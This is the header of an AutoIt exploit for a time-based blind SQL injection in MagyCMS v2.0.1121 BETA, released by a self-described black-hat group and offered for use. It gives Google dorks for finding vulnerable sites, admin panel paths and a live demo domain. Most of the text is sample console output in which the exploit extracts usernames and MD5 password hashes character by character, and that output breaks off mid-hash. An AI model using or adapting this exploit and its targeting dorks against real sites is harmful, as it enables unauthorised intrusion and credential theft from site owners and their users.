#Region ;**** Directives created by AutoIt3Wrapper_GUI **** #AutoIt3Wrapper_Outfile=cpl.exe #AutoIt3Wrapper_UseUpx=n #AutoIt3Wrapper_Change2CUI=y #EndRegion ;**** Directives created by AutoIt3Wrapper_GUI **** #NoTrayIcon #include #include #include #include #cs THIS IS A COMPLETE EXPLOIT WHICH IS WRITTEN IN THE AUTOIT SCRIPTING/PROGRAMMING LANGUAGE. THIS IS A CONSOLE APPLICATION. ITS MAIN PURPOSE IS TO EXPLOIT A BLIND SQL INJECTION VULNERABILITY IN magy cms v 2.0.1121 BETA USING A TIME-BASED TECHNIQUE and obtain usernames + MD5 passwords. By default it'll obtain 5 usernames and the corresponding MD5 PASSWORDS from the vulnerable site. Since it uses a time-based technique it is a really slow exploit. But it is a more convenient way than manual work;) In fact i coded it For Fun because we always prefer manual work. * ANYWAYS, save it as e.g. poc.au3 and COMPILE + ENJOY) * #ce #cs ============ * AZERBAIJAN BLACK HATZ PRESENTS!) * ================== -------------------------------------------------------------------- Vulnerable Software: MagyCMS v2.0.1121 BETA (Previous and Newest versions also affected) Vendor: http://www.emagy.com && broncoway.com -------------------------------------------------------------------- Vuln Type: Blind SQL injection Exploitation technique: Time Based. 
Exploit: Available -------------------------------------------------------------------- Credits: AkaStep & BOT_25 & CAMOUFL4G3 -------------------------------------------------------------------- ShouTz to mariaoza;) CAMOUFL4G3 says: FreeDom is Paradise :P DORK 1: google+ site:am Website by Broncoway DORK 2: google+ site:am inurl: /magycms/ Admin Panel: site.tld/magycms/Admin/ or site.tld/magycms/Admin/Login.php Demo: http://www.sgp.am -------------------------------------------------------------------- Example usage of exploit: cmd.exe >D:\programming1\magy_exploit\poc_HAZIR_USERNAME_DONE\x_azirmagy_exploit>cpl.exe http://192.168.0.15/learn/pwnmagyasap/ ###################################################### # MagyCMS v2.0.1121 BETA Blind SQL Injection Exploit # # Exploitation technique: Time Based # # Author: AkaStep & BOT_25 # ###################################################### ---------------------------------------- [+] Verifying your internet connection.... Please Wait...[+] ---------------------------------------- ---------------------------------------- [+] Inet Connection is OK .... [+] ---------------------------------------- ---------------------------------------- [+] Verifying is Target Site Vulnerable? Please wait...[+] ---------------------------------------- ---------------------------------------- [+] Reply from target site: [+] ---------------------------------------- [+] - - - - * Vulnerable! * - - - - . [+] ---------------------------------------- [+] Trying to get average value for sleep(1) if condition is TRUE...[+] ---------------------------------------- [+] Please wait... 
[+] ---------------------------------------- ---------------------------------------- [+] AVG sleep timeout FOR TRUE CONDITION IS: 1087 ms [+] ---------------------------------------- ---------------------------------------- [+] AVG sleep timeout FOR FALSE CONDITION IS: 93 ms [+] ---------------------------------------- ---------------------------------------- [+] Getting To Fetch Username(s) from table... Please wait... [+] ---------------------------------------- [+] TRUE AT OFFSET [0] Currently : [m]. Responce Time: 1066.51545360847 ms. Logging to axa.txt... [+] [+] TRUE AT OFFSET [0] Currently : [ma]. Responce Time: 1044.58516260608 ms. Logging to axa.txt... [+] [+] TRUE AT OFFSET [0] Currently : [man]. Responce Time: 1086.89845022196 ms. Logging to axa.txt... [+] [+] TRUE AT OFFSET [0] Currently : [mana]. Responce Time: 1046.11742474319 ms. Logging to axa.txt... [+] [+] TRUE AT OFFSET [0] Currently : [manag]. Responce Time: 1070.21242516611 ms. Logging to axa.txt... [+] [+] TRUE AT OFFSET [0] Currently : [manage]. Responce Time: 1063.79253086555 ms. Logging to axa.txt... [+] [+] TRUE AT OFFSET [0] Currently : [manager]. Responce Time: 1107.93347514309 ms. Logging to axa.txt... [+] [+] TRUE AT OFFSET [1] Currently : [r]. Responce Time: 1079.4193285235 ms. Logging to axa.txt... [+] [+] TRUE AT OFFSET [1] Currently : [ro]. Responce Time: 1092.09901537247 ms. Logging to axa.txt... [+] [+] TRUE AT OFFSET [1] Currently : [roo]. Responce Time: 1266.5817253381 ms. Logging to axa.txt... [+] [+] TRUE AT OFFSET [1] Currently : [root]. Responce Time: 1097.96913476208 ms. Logging to axa.txt... [+] [+] TRUE AT OFFSET [2] Currently : [d]. Responce Time: 1082.47758977717 ms. Logging to axa.txt... [+] [+] TRUE AT OFFSET [3] Currently : [t]. Responce Time: 1074.85995733176 ms. Logging to axa.txt... [+] [+] TRUE AT OFFSET [3] Currently : [te]. Responce Time: 1088.53933904958 ms. Logging to axa.txt... [+] [+] TRUE AT OFFSET [3] Currently : [tes]. 
Responce Time: 1080.99278273973 ms. Logging to axa.txt... [+] [+] TRUE AT OFFSET [3] Currently : [test]. Responce Time: 1073.98846265903 ms. Logging to axa.txt... [+] ---------------------------------------- [#] Username0 => [manager] [#] ---------------------------------------- ---------------------------------------- [#] Username1 => [root] [#] ---------------------------------------- ---------------------------------------- [#] Username2 => [d] [#] ---------------------------------------- ---------------------------------------- [#] Username3 => [test] [#] ---------------------------------------- ---------------------------------------- * Total 4 users * ---------------------------------------- ---------------------------------------- [+] END OF USERNAME FETCHING. PREVIOUS RECORDS ARE COMPLETE USERNAMES [+] ---------------------------------------- ---------------------------------------- [+] GOING TO FETCH MD5 PASSWORDS. This may take few minutes too. Please wait... [+] ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 0 Responce Time: 1122.93256476205 ms. Need to fetch other: [31] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04 Responce Time: 1147.73191815969 ms. Need to fetch other: [30] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e Responce Time: 1093.4105956323 ms. Need to fetch other: [29] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8 Responce Time: 1086.12022668676 ms. Need to fetch other: [28] symbol(s). Logging to axa.txt... 
---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e Responce Time: 1088.69703233325 ms. Need to fetch other: [27] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e4 Responce Time: 1079.73130163186 ms. Need to fetch other: [26] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47 Responce Time: 1089.67269514766 ms. Need to fetch other: [25] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e Responce Time: 1120.84654283897 ms. Need to fetch other: [24] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e6 Responce Time: 1096.57454880375 ms. Need to fetch other: [23] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68 Responce Time: 1197.06674603001 ms. Need to fetch other: [22] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a Responce Time: 1117.15728038546 ms. Need to fetch other: [21] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7 Responce Time: 1074.80582819299 ms. Need to fetch other: [20] symbol(s). Logging to axa.txt... 
---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b Responce Time: 1090.67017703246 ms. Need to fetch other: [19] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b5 Responce Time: 1095.4439395126 ms. Need to fetch other: [18] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b58 Responce Time: 1079.56000213028 ms. Need to fetch other: [17] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b585 Responce Time: 1121.39697688334 ms. Need to fetch other: [16] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b5859 Responce Time: 1069.7244734608 ms. Need to fetch other: [15] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b58594 Responce Time: 1088.90167696824 ms. Need to fetch other: [14] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b58594f Responce Time: 1090.38322342555 ms. Need to fetch other: [13] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b58594fd Responce Time: 1131.33884657918 ms. Need to fetch other: [12] symbol(s). Logging to axa.txt... 
---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b58594fdc Responce Time: 1085.94070681407 ms. Need to fetch other: [11] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b58594fdcf Responce Time: 1086.03164216324 ms. Need to fetch other: [10] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b58594fdcf9 Responce Time: 1085.01732856736 ms. Need to fetch other: [9] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b58594fdcf99 Responce Time: 1090.81806852607 ms. Need to fetch other: [8] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b58594fdcf994 Responce Time: 1164.10285238106 ms. Need to fetch other: [7] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b58594fdcf994c Responce Time: 1087.62590294072 ms. Need to fetch other: [6] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b58594fdcf994c5 Responce Time: 1084.24126538578 ms. Need to fetch other: [5] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b58594fdcf994c5d Responce Time: 1110.72200045738 ms. Need to fetch other: [4] symbol(s). 
Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b58594fdcf994c5d4 Responce Time: 1095.35167837798 ms. Need to fetch other: [3] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b58594fdcf994c5d49 Responce Time: 1100.45665915848 ms. Need to fetch other: [2] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b58594fdcf994c5d490 Responce Time: 1141.79013618122 ms. Need to fetch other: [1] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [0] [+] Currently MD5 hash is : 04e8e47e68a7b58594fdcf994c5d490d Responce Time: 1166.55627727462 ms. Need to fetch other: [ *NONE* ] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e Responce Time: 1171.26590832908 ms. Need to fetch other: [31] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e1 Responce Time: 1132.57401498087 ms. Need to fetch other: [30] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10 Responce Time: 1208.55810555533 ms. Need to fetch other: [29] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10a Responce Time: 1123.42031597051 ms. Need to fetch other: [28] symbol(s). Logging to axa.txt... 
---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10ad Responce Time: 1122.12616389991 ms. Need to fetch other: [27] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc Responce Time: 1082.92028182339 ms. Need to fetch other: [26] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3 Responce Time: 1089.85126266028 ms. Need to fetch other: [25] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc39 Responce Time: 1140.08007343197 ms. Need to fetch other: [24] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc394 Responce Time: 1148.83027251909 ms. Need to fetch other: [23] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949 Responce Time: 1091.6165547748 ms. Need to fetch other: [22] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949b Responce Time: 1087.22355838061 ms. Need to fetch other: [21] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba Responce Time: 1073.28650311553 ms. Need to fetch other: [20] symbol(s). Logging to axa.txt... 
---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba5 Responce Time: 1075.00146049429 ms. Need to fetch other: [19] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59 Responce Time: 1075.08258904097 ms. Need to fetch other: [18] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59a Responce Time: 1103.84616628081 ms. Need to fetch other: [17] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59ab Responce Time: 1088.21680476932 ms. Need to fetch other: [16] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59abb Responce Time: 1091.30892994201 ms. Need to fetch other: [15] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59abbe Responce Time: 1120.06679051525 ms. Need to fetch other: [14] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59abbe5 Responce Time: 1102.02194814024 ms. Need to fetch other: [13] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59abbe56 Responce Time: 1142.12833929081 ms. Need to fetch other: [12] symbol(s). Logging to axa.txt... 
---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59abbe56e Responce Time: 1103.72041465256 ms. Need to fetch other: [11] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59abbe56e0 Responce Time: 1111.04395079055 ms. Need to fetch other: [10] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59abbe56e05 Responce Time: 1214.34433706028 ms. Need to fetch other: [9] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59abbe56e057 Responce Time: 1163.34768347812 ms. Need to fetch other: [8] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59abbe56e057f Responce Time: 1201.57191540286 ms. Need to fetch other: [7] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59abbe56e057f2 Responce Time: 1138.68858765629 ms. Need to fetch other: [6] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59abbe56e057f20 Responce Time: 1116.66783999098 ms. Need to fetch other: [5] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59abbe56e057f20f Responce Time: 1098.96241373153 ms. Need to fetch other: [4] symbol(s). 
Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59abbe56e057f20f8 Responce Time: 1130.48200572043 ms. Need to fetch other: [3] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59abbe56e057f20f88 Responce Time: 1108.71546050055 ms. Need to fetch other: [2] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59abbe56e057f20f883 Responce Time: 1116.813345572 ms. Need to fetch other: [1] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [1] [+] Currently MD5 hash is : e10adc3949ba59abbe56e057f20f883e Responce Time: 1088.2162383657 ms. Need to fetch other: [ *NONE* ] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 3 Responce Time: 1112.91223563393 ms. Need to fetch other: [31] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 32 Responce Time: 1103.2336007669 ms. Need to fetch other: [30] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326 Responce Time: 1073.39268625061 ms. Need to fetch other: [29] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 3263 Responce Time: 1078.83931116799 ms. Need to fetch other: [28] symbol(s). Logging to axa.txt... 
---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 32637 Responce Time: 1073.24368450567 ms. Need to fetch other: [27] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373 Responce Time: 1097.87935978848 ms. Need to fetch other: [26] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373d Responce Time: 1156.96056540113 ms. Need to fetch other: [25] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da Responce Time: 1072.94168611591 ms. Need to fetch other: [24] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da5 Responce Time: 1109.29933992676 ms. Need to fetch other: [23] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da56 Responce Time: 1078.17109775162 ms. Need to fetch other: [22] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da562 Responce Time: 1091.15269276676 ms. Need to fetch other: [21] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da5622 Responce Time: 1076.48035788689 ms. Need to fetch other: [20] symbol(s). Logging to axa.txt... 
---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da56226 Responce Time: 1135.50237933379 ms. Need to fetch other: [19] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da562269 Responce Time: 1203.56181913304 ms. Need to fetch other: [18] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da5622693 Responce Time: 1090.62271190795 ms. Need to fetch other: [17] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da56226931 Responce Time: 1092.65591544045 ms. Need to fetch other: [16] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da562269316 Responce Time: 1100.2446888696 ms. Need to fetch other: [15] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da5622693167 Responce Time: 1094.95098541072 ms. Need to fetch other: [14] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da56226931679 Responce Time: 1128.80178191581 ms. Need to fetch other: [13] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da562269316790 Responce Time: 1169.40833252404 ms. Need to fetch other: [12] symbol(s). Logging to axa.txt... 
---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da5622693167903 Responce Time: 1096.74959509033 ms. Need to fetch other: [11] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da56226931679032 Responce Time: 1178.17792216336 ms. Need to fetch other: [10] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da562269316790326 Responce Time: 1106.2009016093 ms. Need to fetch other: [9] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da562269316790326c Responce Time: 1300.28445742105 ms. Need to fetch other: [8] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da562269316790326c0 Responce Time: 1092.92270156983 ms. Need to fetch other: [7] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da562269316790326c00 Responce Time: 1127.17008586904 ms. Need to fetch other: [6] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da562269316790326c00a Responce Time: 1098.36618620519 ms. Need to fetch other: [5] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da562269316790326c00a9 Responce Time: 1113.63942520058 ms. Need to fetch other: [4] symbol(s). 
Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da562269316790326c00a99 Responce Time: 1125.85533775888 ms. Need to fetch other: [3] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da562269316790326c00a997 Responce Time: 1151.71279577202 ms. Need to fetch other: [2] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da562269316790326c00a9972 Responce Time: 1133.74918720454 ms. Need to fetch other: [1] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [2] [+] Currently MD5 hash is : 326373da562269316790326c00a9972f Responce Time: 1126.98230301967 ms. Need to fetch other: [ *NONE* ] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 7 Responce Time: 1109.83144103983 ms. Need to fetch other: [31] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74 Responce Time: 1098.13795060885 ms. Need to fetch other: [30] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a Responce Time: 1096.22027336493 ms. Need to fetch other: [29] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5 Responce Time: 1112.61976585727 ms. Need to fetch other: [28] symbol(s). Logging to axa.txt... 
---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d Responce Time: 1142.74313282603 ms. Need to fetch other: [27] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1 Responce Time: 1084.91810768561 ms. Need to fetch other: [26] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1f Responce Time: 1112.79996992547 ms. Need to fetch other: [25] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ff Responce Time: 1098.22970548891 ms. Need to fetch other: [24] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffc Responce Time: 1162.94171493733 ms. Need to fetch other: [23] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce Responce Time: 1288.16907398647 ms. Need to fetch other: [22] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce4 Responce Time: 1141.83313523826 ms. Need to fetch other: [21] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce47 Responce Time: 1103.65852377924 ms. Need to fetch other: [20] symbol(s). Logging to axa.txt... 
---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472 Responce Time: 1168.90490496762 ms. Need to fetch other: [19] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f Responce Time: 1096.50154288596 ms. Need to fetch other: [18] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f0 Responce Time: 1139.7646542839 ms. Need to fetch other: [17] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f02 Responce Time: 1108.4753730338 ms. Need to fetch other: [16] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f020 Responce Time: 1088.28836460353 ms. Need to fetch other: [15] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f0206 Responce Time: 1077.87990864862 ms. Need to fetch other: [14] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f0206d Responce Time: 1079.14208898928 ms. Need to fetch other: [13] symbol(s). Logging to axa.txt... ---------------------------------------- ---------------------------------------- [+] TRUE AT OFFSET [3] [+] Currently MD5 hash is : 74a5d1ffce472f0206dd Responce Time: 1108.17988076703 ms. Need to fetch other: [12] symbol(s). Logging to axa.txt... 
